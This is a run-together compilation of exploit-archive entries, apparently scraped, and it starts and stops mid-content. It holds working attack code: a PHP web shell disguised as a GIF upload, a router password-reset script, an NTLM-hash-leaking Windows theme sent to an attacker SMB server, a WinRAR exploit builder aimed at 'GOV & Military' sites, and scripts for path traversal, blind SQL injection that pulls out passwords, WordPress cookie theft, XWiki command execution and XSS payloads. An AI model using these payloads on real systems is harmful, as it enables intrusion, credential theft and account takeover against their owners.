Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light
-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="name"
test
-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="logo"; filename="revshell.php"
Content-Type: image/jpeg
GIF89a;
<?php
system($_GET['cmd']);
?>
-----------------------------29251442139477260933920738324
Content-Disposition: form-data; name="logo-url"
----- SNIP -----
5) You will get the response that your file was uploaded ok:
{"status":"Success","message":"Subscription updated successfully"}
6) Your file will be located in:
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php
# Exploit Title: Aztech DSL5005EN Router - 'sysAccess.asp' Admin Password Change (Unauthenticated)
# Date: 2025-02-26
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://www.aztech.com
# Version: DSL5005EN
# Tested on: Linux
# CVE: N/A
import requests
import argparse
print('''
#################################################################################
# aztech DSL5005EN router/modem - admin password change (Unauthenticated) #
# BY: Amir Hossein Jamshidi #
# Mail: amirhosseinjamshidi64@gmail.com #
# github: https://github.com/amirhosseinjamshidi64 #
# Usage: python Exploit.py --ip TRAGET_IP --password PASSWORD #
#################################################################################
''')
def change_password(ip_address, password):
"""
Changes the password of a device at the given IP address.
Args:
ip_address: The IP address of the device (e.g., "192.168.1.1").
password: The new password to set.
"""
url = f"http://{ip_address}/cgi-bin/sysAccess.asp"
origin = f"http://{ip_address}"
referer = f"http://{ip_address}/cgi-bin/sysAccess.asp"
payload = {
"saveFlag": "1",
"adminFlag": "1",
"SaveBtn": "SAVE",
"uiViewTools_Password": password,
"uiViewTools_PasswordConfirm": password
}
headers = {
"Cache-Control": "max-age=0",
"Accept-Language": "en-US,en;q=0.9",
"Origin": origin,
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Referer": referer,
"Connection": "keep-alive"
}
try:
response = requests.post(url, data=payload, headers=headers, timeout=10)
if response.status_code == 200:
print(f"Password change request to {ip_address} successful!")
print(f"Username: admin")
print(f"Password: {password}")
else:
print(f"Request to {ip_address} failed with status code: {response.status_code}")
print(f"Response content:\n{response.text}") # Print response for debugging
except requests.exceptions.RequestException as e:
print(f"An error occurred: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Change password of a device.")
parser.add_argument("--ip", dest="ip_address", required=True, help="The IP address of the device.")
parser.add_argument("--password", dest="password", required=True, help="The new password to set.")
args = parser.parse_args()
change_password(args.ip_address, args.password)
# Exploit Title: CVE-2024-21320 - NTLM Hash Leak via Malicious Windows Theme
# Date: 02/03/2025
# Exploit Author: Abinesh Kamal K U
# CVE : CVE-2024-21320
# Ref: https://www.cve.org/CVERecord?id=CVE-2024-21320
## Step 1: Install Responder
Responder is a tool to capture NTLM hashes over SMB.
git clone https://github.com/lgandx/Responder.git
cd Responder
Replace `eth0` with your network interface.
## Step 2: Create a Malicious Windows Theme File
### Python Script to Generate the Malicious `.theme` File
import os
# Attacker-controlled SMB server IP
attacker_smb_server = "192.168.1.100" # Change this to your attacker's IP
# Name of the malicious theme file
theme_filename = "malicious.theme"
# Malicious .theme file content
theme_content = f"""
[Theme]
DisplayName=Security Update Theme
[Control Panel\Desktop]
Wallpaper=\\\\{attacker_smb_server}\\share\\malicious.jpg
[VisualStyles]
Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""
# Write the theme file
with open(theme_filename, "w") as theme_file:
theme_file.write(theme_content)
print(f"[+] Malicious theme file '{theme_filename}' created.")
# Optional: Start a Python HTTP server to serve the malicious theme file
start_http = input("Start HTTP server to deliver theme file? (y/n):
").strip().lower()
if start_http == "y":
print("[+] Starting HTTP server on port 8080...")
os.system("python3 -m http.server 8080")
```
## Step 3: Deliver & Capture NTLM Hashes
1. Send the `malicious.theme` file to the target.
2. Run Responder to capture the NTLM hash:
sudo python3 Responder.py -I eth0
3. Wait for the victim to open the `.theme` file.
4. Extract NTLM hash from Responder logs and crack it using hashcat:
hashcat -m 5600 captured_hashes.txt rockyou.txt
--
Abinesh Kamal K U
abineshjerry.info
MTech - Cyber Security Systems & Networks
Amrita University
################################################################################################
# Exploit Title : EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831 #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Security Risk : High #
# #
# Description : All target's GOV & Military websites #
# #
################################################################################################
# #
# Expl0iTs: #
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "zip.h"
#define PDF_FILE "document.pdf"
#define FOLDER_NAME "document.pdf\\"
#define SCRIPT_FILE "script.bat"
#define ZIP_FILE "exploit.zip"
int main(void) {
zipFile zf = zipOpen(ZIP_FILE, APPEND_STATUS_CREATE);
if (zf == NULL) {
printf("Error opening ZIP file\n");
return -1;
}
zip_fileinfo zfi;
memset(&zfi, 0, sizeof(zfi));
if (zipOpenNewFileInZip(zf, PDF_FILE, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding PDF file to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
FILE *fp = fopen(PDF_FILE, "rb");
if (fp == NULL) {
printf("Error opening PDF file\n");
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
char buffer[1024];
int bytes_read;
while ((bytes_read = fread(buffer, 1, sizeof(buffer), fp)) > 0) {
if (zipWriteInFileInZip(zf, buffer, bytes_read) < 0) {
printf("Error writing PDF file to ZIP file\n");
fclose(fp);
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
}
fclose(fp);
zipCloseFileInZip(zf);
if (zipOpenNewFileInZip(zf, FOLDER_NAME, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding folder to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
zipCloseFileInZip(zf);
char script_name[256];
sprintf(script_name, "%s%s", FOLDER_NAME, SCRIPT_FILE);
if (zipOpenNewFileInZip(zf, script_name, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
printf("Error adding script file to ZIP file\n");
zipClose(zf, NULL);
return -1;
}
char script_content[] = "@echo off\nstart cmd /c \"echo You have been exploited by CVE-2023-38831 && pause\"\n";
if (zipWriteInFileInZip(zf, script_content, strlen(script_content)) < 0) {
printf("Error writing script file to ZIP file\n");
zipCloseFileInZip(zf);
zipClose(zf, NULL);
return -1;
}
zipCloseFileInZip(zf);
zipClose(zf, NULL);
printf("ZIP file created successfully\n");
return 0;
}
https://nvd.nist.gov/vuln/detail/CVE-2023-38831
https://nvd.nist.gov/vuln/detail/CVE-2023-38831
https://github.com/HDCE-inc/CVE-2023-38831
https://www.cvedetails.com/cve/CVE-2023-38831/
https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/CVE-2023-38831
http://packetstormsecurity.com/files/174573/WinRAR-Remote-Code-Execution.html
https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/
https://news.ycombinator.com/item?id=37236100
https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
https://hdce.medium.com/cve-2023-38831-winrar-zero-day-poses-new-risks-for-traders-684911befad2
# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal
# Date: 2024-03-06
# Exploit Author: Ven3xy
# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.10
# Tested on: Linux
import sys
import requests
from urllib.parse import urljoin
import time
def exploit(target_url, file_name, depth):
traversal = '../' * depth
exploit_url = urljoin(target_url, '/wp-admin/tools.php')
params = {
'page': 'backup_manager',
'download_backup_file': f'{traversal}{file_name}'
}
response = requests.get(exploit_url, params=params)
if response.status_code == 200 and response.headers.get('Content-Disposition') \
and 'attachment; filename' in response.headers['Content-Disposition'] \
and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:
print(response.text) # Replace with the desired action for the downloaded content
file_path = f'simplebackup_{file_name}'
with open(file_path, 'wb') as file:
file.write(response.content)
print(f'File saved in: {file_path}')
else:
print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Usage: python exploit.py <target_url> <file_name> <depth>")
sys.exit(1)
target_url = sys.argv[1]
file_name = sys.argv[2]
depth = int(sys.argv[3])
print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n")
time.sleep(5)
exploit(target_url, file_name, depth)
# Exploit Title: ASUS Control Center Express 01.06.15 - Unquoted Service Path
Privilege Escalation
# Date: 2024-04-02
# Exploit Author: Alaa Kachouh
# Vendor Homepage:
https://www.asus.com/campaign/ASUS-Control-Center-Express/global/
# Version: Up to 01.06.15
# Tested on: Windows
# CVE: CVE-2024-27673
===================================================================
ASUS Control Center Express Version =< 01.06.15 contains an unquoted
service path which allows attackers to escalate privileges to the system
level.
Assuming attackers have write access to C:\, the attackers can abuse the
Asus service "Apro console service"/apro_console.exe which upon restarting
will invoke C:\Program.exe with SYSTEM privileges.
The binary path of the service alone isn't susceptible, but upon its
initiation, it will execute C:\program.exe as SYSTEM.
Service Name: AProConsoleService
binary impacted: apro_console.exe
# If a malicious payload is inserted into C:\ and service is executed in
any way, this can grant privileged access to the system and perform
malicious activities.
# Exploit Title: Medicine Tracker System v1.0 - Sql Injection
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip
# Version: V1.0.0
# Tested on: Windows/Linux
# Proof of Concept:
# 1- http://localhost/php-mts/app/login.php
# 2- login with default credential
# 3- Click left side Manage account and fill Update User Details and click update account
# 4- Capture request using burp suite
# 5- Save request request.txt
Sqlmap
POST /php-mts/classes/Users.php?f=save_user HTTP/1.1
Host: localhost
Content-Length: 661
sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeOo3CzyRX6fHexZx
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-mts/app/?page=manage_account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql
Connection: close
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="id"
1'-'
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="firstname"
gogo
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="middlename"
ogo
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="lastname"
singh
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="username"
mayuri.infospace@gmail.com
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="password"
12345678
------WebKitFormBoundaryeOo3CzyRX6fHexZx--
sqlmap
sqlmap -r request.txt -p "id" --dbs --batch
___
__H__
___ ___["]_____ ___ ___ {1.6.12#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:18:01 /2023-03-21/
[13:18:01] [INFO] parsing HTTP request from 'request.txt'
it appears that provided value for POST parameter 'id' has boundaries. Do you want to inject inside? ('' or true*--') [y/N] N
[13:18:01] [INFO] resuming back-end DBMS 'mysql'
[13:18:01] [INFO] testing connection to the target URL
[13:18:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=' or true AND (SELECT 3138 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(3138=3138,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mDhI--&name=para&description=ss
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=' or true AND (SELECT 8994 FROM (SELECT(SLEEP(5)))doso)-- HjCh--&name=para&description=ss
---
[13:18:01] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.54, PHP 8.0.25
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:18:01] [INFO] fetching database names
[13:18:01] [INFO] resumed: 'information_schema'
[13:18:01] [INFO] resumed: 'art_gallery'
[13:18:01] [INFO] resumed: 'hcpms'
[13:18:01] [INFO] resumed: 'mts_db'
[13:18:01] [INFO] resumed: 'mysql'
[13:18:01] [INFO] resumed: 'performance_schema'
[13:18:01] [INFO] resumed: 'phpmyadmin'
[13:18:01] [INFO] resumed: 'sscdms_db'
[13:18:01] [INFO] resumed: 'test'
available databases [9]:
[*] art_gallery
[*] hcpms
[*] information_schema
[*] mts_db
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] sscdms_db
[*] test
[13:18:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.2'
[*] ending @ 13:18:01 /2023-03-21/
# Exploit Title: CVE-2023-48292 Remote Code Execution Exploit
# Google Dork: N/A
# Date: 23 March 2025
# Exploit Author: Mehran Seifalinia
# Vendor Homepage: https://www.xwiki.org/
# Software Link: https://www.xwiki.org/xwiki/bin/view/Download/
# Version: XWiki Standard 14.10
# Tested on: Ubuntu 20.04 LTS with OpenJDK 11
# CVE : CVE-2023-48292
from argparse import ArgumentParser
import sys
import logging
from requests import get, post, RequestException
import validators
# Constants
CVE_NAME = "CVE-2023-48292"
HEADERS = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
}
# Configure logging
def setup_logging(logfile):
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# Create a logging handler for console output
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
logger.addHandler(console_handler)
# Create a logging handler for file output
file_handler = logging.FileHandler(logfile)
file_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
logger.addHandler(file_handler)
def validate_url(url):
"""
Validate the URL to ensure it has the correct format and starts with 'http://' or 'https://'.
"""
if not validators.url(url):
logging.error("Invalid target URL format. It must start with 'http://' or 'https://'.")
sys.exit(1)
return url.rstrip("/")
def check_vulnerability(target_url, method):
"""
Check if the target URL is vulnerable to the CVE-2023-48292 vulnerability.
We send a test payload and inspect the response to determine if the vulnerability exists.
"""
try:
# Test payload to check for vulnerability
test_payload = "echo 'testtesttest1234'" # Payload to execute a test command on the target system
vulnerable_url = f"{target_url}/xwiki/bin/view/Admin/RunShellCommand?command={test_payload}"
if method == "GET":
response = get(vulnerable_url, headers=HEADERS)
else: # method == "POST"
response = post(vulnerable_url, headers=HEADERS)
if response.status_code == 200 and "testtesttest1234" in response.text:
logging.info("Target is vulnerable! Command execution test succeeded.")
return True
else:
logging.info("Target does not appear to be vulnerable.")
return False
except RequestException as error:
logging.error(f"HTTP Request Error: {error}")
sys.exit(1)
def perform_attack(target_url, payload, method):
"""
Perform the attack by sending a custom payload to the vulnerable server.
"""
try:
logging.info(f"Attempting attack with payload: {payload}")
vulnerable_url = f"{target_url}/xwiki/bin/view/Admin/RunShellCommand?command={payload}"
if method == "GET":
response = get(vulnerable_url, headers=HEADERS)
else: # method == "POST"
response = post(vulnerable_url, headers=HEADERS)
if response.status_code == 200:
logging.info(f"Attack successful! Response: {response.text[:100]}...") # Display a snippet of the response
else:
logging.warning("Attack attempt failed.")
except RequestException as error:
logging.error(f"HTTP Request Error: {error}")
sys.exit(1)
def main():
"""
Main function to parse command-line arguments, check for vulnerability, and optionally perform the attack.
"""
parser = ArgumentParser(description=f"{CVE_NAME} Exploit Script")
parser.add_argument("target", help="Target URL (e.g., https://vulnsite.com)")
parser.add_argument("--exploit", action="store_true", help="Perform attack with a payload")
parser.add_argument("--payload", default="echo 'testtesttest1234'", help="Custom payload for exploitation")
parser.add_argument("--method", choices=["GET", "POST"], default="GET", help="HTTP method to use (GET or POST)")
parser.add_argument("--logfile", default="exploit.log", help="Log file to store results")
args = parser.parse_args()
# Set up logging to file and console
setup_logging(args.logfile)
# Validate the target URL
target_url = validate_url(args.target)
logging.info("Checking the target for vulnerability...")
if check_vulnerability(target_url, args.method):
if args.exploit:
# Perform the attack with the provided payload
perform_attack(target_url, args.payload, args.method)
else:
logging.info("Run with '--exploit' to attempt the attack.")
else:
logging.warning("The target is not vulnerable. Exiting.")
if __name__ == "__main__":
main()
# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)
# Date: 02/04/2024
# Exploit Author: Sandeep Vishwakarma
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: v1.0
# Tested on: Windows 10
# CVE: CVE-2024-29410
# Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component.
# POC:
1. Here we go to : http://127.0.0.1/fuelflow/index.php
2. Now login with default username=mayuri.infospace@gmail.com and Password=admin
3. Now go to "http://127.0.0.1/fuelflow/admin/web.php"
4. Upload the san.php file in "Image" field
5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page
6. The content of san.php file is given below: <?php phpinfo();?>
# Reference:
https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29410.md
# Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)
# Google Dork: NA
# Date: 28-03-2024
# Exploit Author: Sandeep Vishwakarma
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
# Version: v1.0
# Tested on: Windows 10
# Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE -
v1.0 allows an attacker to execute arbitrary code via a crafted payload to
the Firstname and lastname parameter in the profile component.
# POC:
1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile
2. In fname & lname parameter add payolad
"><script>alert("Hacked_by_Sandy")</script>
3. click on submit.
# Reference:
https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md
# Exploit Title: Litespeed Cache 6.5.0.1 - Authentication Bypass
# Google Dork: [if applicable]
# Date: reported on 17 September 2024
# Exploit Author: Gnzls
# Vendor Homepage: https://www.litespeedtech.com/
# Software Link: https://github.com/gbrsh/CVE-2024-44000?tab=readme-ov-file
# Version: 6.5.0.1
# Tested on: macOS M2 pro
# CVE : CVE-2024-44000
import re
import sys
import requests
import argparse
from urllib.parse import urljoin
def extract_latest_cookies(log_content):
user_cookies = {}
pattern_cookie = re.compile(r'Cookie:\s.*?wordpress_logged_in_[^=]+=(.*?)%')
for line in log_content.splitlines():
cookie_match = pattern_cookie.search(line)
if cookie_match:
username = cookie_match.group(1)
user_cookies[username] = line
return user_cookies
def choose_user(user_cookies):
users = list(user_cookies.keys())
if not users:
print("No users found.")
sys.exit(1)
# Display user options
print("Select a user to impersonate:")
for idx, user in enumerate(users):
print(f"{idx + 1}. {user}")
# Get the user's choice
choice = int(input("Pick a number: ")) - 1
if 0 <= choice < len(users):
return users[choice], user_cookies[users[choice]]
else:
print("Invalid selection.")
sys.exit(1)
print("--- LiteSpeed Account Takeover exploit ---")
print(" (unauthorized account access)")
print("\t\t\tby Gonzales")
parser = argparse.ArgumentParser()
parser.add_argument('url', help='http://wphost')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
log_file_url = urljoin(args.url, 'wp-content/debug.log')
response = requests.get(log_file_url)
if response.status_code == 200:
log_content = response.text
ucookies = extract_latest_cookies(log_content)
choice, cookie = choose_user(ucookies)
print(f"Go to {args.url}/wp-admin/ and set this cookie:")
print(cookie.split(']')[1])
else:
print("Log file not found.")
sys.exit(1)
1. Overview: Purpose and Target
The script aims to extract cookies (which contain session information) from a WordPress debug.log file, allowing the attacker to impersonate a logged-in user and access their account without authorization.
2. How the Code Works
extract_latest_cookies Function:
Purpose: This function scans the contents of the debug.log file and uses a regular expression to extract cookies for logged-in WordPress users.
How it Works:
The function reads each line of the debug.log file.
It searches for lines that contain cookies using the following regular expression: Cookie:\s.*?wordpress_logged_in_[^=]+=(.*?)%.
This pattern matches WordPress login cookies and extracts the username and cookie value.
The extracted cookie values are stored in a dictionary called user_cookies, where the keys are usernames and the values are the corresponding cookie strings.
choose_user Function:
Purpose: Once cookies are extracted, this function allows the attacker to select which user's cookie to use for impersonation.
How it Works:
It checks if there are any users (i.e., cookies) available.
If no cookies are found, it prints a message and exits the program.
If cookies are found, it prints a list of users and asks the attacker to select one.
Once a user is selected, the function returns the corresponding cookie for that user.
Main Program:
Purpose: The main part of the script handles the workflow of retrieving the debug.log file, extracting cookies, and allowing the attacker to choose which user to impersonate.
How It Works:
The script takes a URL as input, which is the target WordPress site (e.g., http://wphost).
It constructs the URL to the debug.log file (http://wphost/wp-content/debug.log).
The script sends an HTTP request to this URL to fetch the log file.
If the file is found (response status 200), it passes the file content to the extract_latest_cookies function to extract cookies.
The attacker selects which user's cookie to use, and the script prints the cookie information.
The attacker can then use this cookie to impersonate the selected user by setting it in their browser and accessing the WordPress admin panel (/wp-admin/).
requests Library:
This library is used to send HTTP requests to the target site and retrieve the debug.log file.
argparse Library:
This allows the user to input the target WordPress URL from the command line.
sys.exit() Function:
The script uses this to exit the program in case of errors, such as when no users are found or the log file is inaccessible.
3. Potential for Abuse
This script exploits a vulnerability in WordPress by targeting publicly accessible debug.log files. If a site has misconfigured logging, this file might be available to anyone on the internet. By accessing the debug.log file, an attacker can extract sensitive session cookies, impersonate users, and gain unauthorized access to WordPress accounts (including admin accounts).
# Exploit Title: Suprema BioStar 2 v2.8.16 - SQL Injection
# Date: 26/03/2023
# Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/)
# Vendor Homepage: https://www.supremainc.com/
# Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp
# Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide
# Version: 2.8.16
# Tested on: Windows, Linux
# CVE-2023-27167
## Description
A Boolean-based SQL injection/Time based SQL vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "values" JSON parameter.
## Request PoC #1
'''
POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 204
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}}
'''
Time based SQL injection (set 4 – response delays for 8 seconds).
'''
## Request PoC #2
'''
POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 188
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}
'''
Boolean-based SQL injection (payload “1 and 3523=03523” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin)
'''
## Exploit with SQLmap
Save the request from Burp Suite to file.
'''
---
Parameter: JSON #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}}
---
[05:02:49] [INFO] testing MySQL
[05:02:49] [INFO] confirming MySQL
[05:02:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL > 5.0.0 (MariaDB fork)
[05:02:50] [INFO] fetching database names
[05:02:50] [INFO] fetching number of databases
[05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[05:02:55] [INFO] retrieved: 2
[05:03:12] [INFO] retrieved: biostar2_ac
[05:03:56] [INFO] retrieved: information_schema
available databases [2]:
[*] biostar2_ac
[*] information schema
'''
# Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter
# Google Dork:
# Date: 04/11/2023
# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)
# Vendor Homepage: https://moodle.org/
# Software Link:
# Version: 3.10.1
# Tested on: Linux
# CVE : CVE-2021-36393
import requests
import string
from termcolor import colored
# Request details
URL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"
HEADERS = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Content-Type": "application/json",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",
"Origin": "http://127.0.0.1:8080",
"Referer": "http://127.0.0.1:8080/moodle/my/",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",
"Connection": "close"
}
# Characters to test
characters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"
def test_character(payload):
response = requests.post(URL, headers=HEADERS, json=[payload])
return response.elapsed.total_seconds() >= 3
def extract_value(column, label):
base_payload = {
"index": 0,
"methodname": "core_course_get_enrolled_courses_by_timeline_classification",
"args": {
"offset": 0,
"limit": 0,
"classification": "all",
"sort": "",
"customfieldname": "",
"customfieldvalue": ""
}
}
result = ""
for _ in range(50): # Assumes a maximum of 50 characters for the value
character_found = False
for character in characters_to_test:
if column == "database()":
base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"
else:
base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"
if test_character(base_payload):
result += character
print(colored(f"{label}: {result}", 'red'), end="\r")
character_found = True
break
if not character_found:
break
# Print the final result
print(colored(f"{label}: {result}", 'red'))
if __name__ == "__main__":
extract_value("database()", "Database")
extract_value("username", "Username")
extract_value("password", "Password")
# Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
# Date: 05/12/2023
# Exploit Author: Jonas Benjamin Friedli
# Vendor Homepage: https://www.42gears.com/products/mobile-device-management/
# Version: <= 6.31
# Tested on: 6.31
# CVE : CVE-2023-3897
import requests
import sys
def print_help():
print("Usage: python script.py [URL] [UserListFile]")
sys.exit(1)
def main():
if len(sys.argv) != 3 or sys.argv[1] == '-h':
print_help()
url, user_list_file = sys.argv[1], sys.argv[2]
try:
with open(user_list_file, 'r') as file:
users = file.read().splitlines()
except FileNotFoundError:
print(f"User list file '{user_list_file}' not found.")
